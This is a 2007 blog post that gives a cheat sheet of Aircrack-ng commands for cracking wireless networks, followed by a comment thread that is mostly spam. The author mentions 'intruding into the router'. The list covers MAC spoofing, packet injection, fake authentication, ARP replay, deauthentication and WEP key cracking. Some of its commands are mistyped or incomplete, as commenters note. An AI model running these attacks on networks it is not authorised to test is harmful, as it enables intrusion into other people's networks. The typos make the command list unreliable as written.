Thursday, November 1, 2007

Hacking and Cracking Wireless

One day after intruding into the router, i remembered my colleague Mark compiled a list of Aircrack-ng commands for cracking and injection. He was doing a wireless project and managed to capture the commands needed when doing the pentest. Check it out. This is a summarized version of the Aircrack-ng commands and it comes in very handy when doing a wireless audit and save you the time needed to read manuals. Use it in your next wireless audit. Thank you Mark for the compilation and your effort.


--------------------------------------------------------------------

install madwifi-ng driver (done! monitor mode working)
install rt73 driver for dlink usb (done! monitor mode working)
install rtutilt for rausb0 configuration
install aircrack-ng (done dev version from svn)



Steps:

#####################################################
CONFIGURATION:

D-Link DWL-G122

ifconfig rausb0 up
iwpriv rausb0 forceprism 1
iwpriv rausb0 rfmontx 1
iwconfig rausb0 mode monitor OR
airmon-ng start rausb0 channel


NetGear WG511T

wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor

specify channel
iwocnfig ath0 channel n
########################################################

CHANGING MAC ADDRESS

ifconfig ath0 down
ifconfig ath0 hw ether
ifconfig ath0 up

use macchanger instead

#########################################################

INJECTION TESTING

NetGear WG511T
aireplay-ng -9
===================
D-Lnk DWL G122

aireplay-ng -9 (if this doesn't work it means no ap on same channel found)
Try card-to-card injection below:
====================

Card-To-Card Injection:
Make sure they are on same channel using (channel hopping does not work on D-Link DWL G122???)
iwlist channel (to find out the current channel set)

aireplay-ng -9 -i ath0 rausb0 (ath0 will mimic an access point)
aireplay-ng -9 -i rausb0 ath0 (rausb0 will mimic an access point)
=====================



########################################################




PACKET CAPTURE:

airodump-ng device (find out first the interested bssid and channel)

Then capture packets on that particular channel:

airodump-ng --channel --bssid -w dumpfile device(ath0/rausb0

Notes: capture full packets when using PTW attack (don't dump ivs only)

MERGING capture files (RESUMING)

mergecap -w out.cap test1.cap test2.cap test3.cap

FOR IVS

use ivstools



############################################################

ATTACKS

You may want to associate to ap first using fakeauth before any test
aireplay-ng --fakeauth=0 -e SSID -a 00:1a:6d:f8:40:d0 -h 06:14:6c:4c:b9:7c ath0

Automatic Association:
ireplay-ng -1 6000 -o 1 -q 10 -e SSID -a 00:1A:6D:F8:40:D0 -h 06:14:6C:4C:B9:7C ath0




ARP replay (for wep cracking PTW method):
if RXQ in airodump window is > 90 then #/s = 200+ (watch for #Data, it contains IV)

aireplay-ng --arpreplay -b -h device

Deauthentication (to capture WPA handshake, reveal hidden SSID)
Fake Authentication (to authenticate to AP in case needed before we can inject)



#############################################################
WEP CRACKING

Using PTW attack (version 0.9+ only) Packets must be ARP (from arp-replay)

aircrack-ng -z -b dumpfile*.cap
40-bit = 20,000
104-bit = 40,000

Normal Attack
-n 64 (test if 40-bin WEP) remove -n for 104-bit (default)
aircrack-ng -n 64 -a 1 capturefile




#########################################################

RESOLVE MAC Address to IP Address

use netdiscover or ARP tools

##########################################################

Determine the frequency on a particular channel
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels then select "Wifi Channel Selection and Channel Overlap" tab.


#######################################################

Increasing injection Speed

iwconfig device rate 11M


#####################################################


---------------------------------------------------------------------------


The Hacka Man

14 comments:

Anonymous said...

Have you personally try those commands in pentesting? YES or NO?

Are you using 'aircrack-ng suit' in MS Windows or Linux? or VM in windows? or Live-CD/USB?

Have you tried Auditor/Backtrack/Backtrack2/CoWAPPty with success wireless pentesting??

Do you agree any 'Certified IT' programme will not accept 'typo error' especially in 'Command'?

I'm just curios and all this bring to me what tools you use in your earlier post regarding gainning access to a router, how you did it too?

Are you using CommView for WiFi/Cain & Abel/Wireshark?

matato said...

Hi there.. mark here. thanks for acknowledging me dude. Here's my response to the previous post. The commands I have noted are not step by step walkthrough on wireless pentesting. I got everything working on my

matato said...

here's the link to my blog.. http://matat0.blogspot.com

Cracking Man said...

hi,thanks.i try and rt73 very good chipset.support injection.i can get the ket around 3 minute with windows+vmware.just find tutorial here Tutorial Cracking WEP In 3 Minute

Anonymous said...

When you "copy paste" a cracking tutorial, for your own sake please at least try it first. The guy before already pointed about your error in command typo, yet you still didn't find it? what a great certified hacker.

Miqdad said...

Oes Tsetnoc one of the ways in which we can learn seo besides Mengembalikan Jati Diri Bangsa. By participating in the Oes Tsetnoc or Mengembalikan Jati Diri Bangsa we can improve our seo skills. To find more information about Oest Tsetnoc please visit my Oes Tsetnoc pages. And to find more information about Mengembalikan Jati Diri Bangsa please visit my Mengembalikan Jati Diri Bangsa page and other update like as Beratnya Mengembalikan Jati Diri Bangsa, Mengembalikan Jati Diri Bangsa di perpanjang and Jangan Berhenti Mengembalikan Jati Diri Bangsa. Thank you So much.

Oes Tsetnoc | Lanjutkan Mengembalikan Jati Diri Bangsa

gaohui said...

The holidays are a time ed hardy of getting together with friends ed hardy shoes and family, attending elaborate ed hardy clothing parties, and other exciting events ed hardy clothes that involves dressing up in stunning ed hardy store wardrobes. If you ed hardy Bikini are pregnant during ed hardy swimsuits the holidays, it does not ed hardy Caps mean that you are unable buy ed hardy to look fabulous and ed hardy swimwear stylish. Now, an expectant ed hardy sale mother has many styles of chic ed hardy glasses maternity clothing that allows cheap ed hardy her to show off her baby bump Christian audigier while looking spectacular.

Mohammad said...

You may have not intended to do so, but I think you have managed to express the state of mind that a lot of people are in. The sense of wanting to help, but not knowing how or where, is something a lot of us are going through. Replica Watches

chunxue said...

During the World War II, Art Deco jewellery was ugg sale a very popular style among women. The females started ugg boots wearing short dresses and cut their hair short. And uggs such boyish style was accessorized with Art Deco jewellery. They used cheap ugg boots long dangling earrings and necklaces, multiple bracelets and bold ugg boots uk rings.Art Deco jewellery has harshly geometric and symmetrical theme instead disocunt ugg boots of free flowing curves and naturalistic motifs. Art Deco Jewelry buy ugg boots today displays designs that consist of arcs, circles, rectangles, squares, and ugg outlet triangles. Bracelets, earrings, necklaces and rings are added with long ugg boots outlet lines and curves.One example of Art Deco jewelry is the Art Deco ring. Art Deco rings have ugg mall sophisticated sparkle and bold styles. These rings are not intended for a subtle look, they are meant to be noticed. Hence, these are perfect for people with bold styles.

chunxue said...

During the World War II, Art Deco jewellery was ugg sale a very popular style among women. The females started ugg boots wearing short dresses and cut their hair short. And uggs such boyish style was accessorized with Art Deco jewellery. They used cheap ugg boots long dangling earrings and necklaces, multiple bracelets and bold ugg boots uk rings.Art Deco jewellery has harshly geometric and symmetrical theme instead disocunt ugg boots of free flowing curves and naturalistic motifs. Art Deco Jewelry buy ugg boots today displays designs that consist of arcs, circles, rectangles, squares, and ugg outlet triangles. Bracelets, earrings, necklaces and rings are added with long ugg boots outlet lines and curves.One example of Art Deco jewelry is the Art Deco ring. Art Deco rings have ugg mall sophisticated sparkle and bold styles. These rings are not intended for a subtle look, they are meant to be noticed. Hence, these are perfect for people with bold styles.

Anonymous said...

[color=#5588aa]How to utilize the advanced search? It was extended because, [/color] [url=http://carlimelkpart.chez.com/nexium.html] need[/url] [color=#5588aa]search criteria[/color]!
[color=#5588aa]Thanks for the sake of the treatment of waiting representing all![/color]

Nikolai said...

The average length of an orgasm for a pig is 30 minutes.online cash advance

Nikola said...

The king of hearts is the only king without a moustache.notebook reviews

William said...

If you compare the weight, a hamburger is more expensive than a car.Contact lenses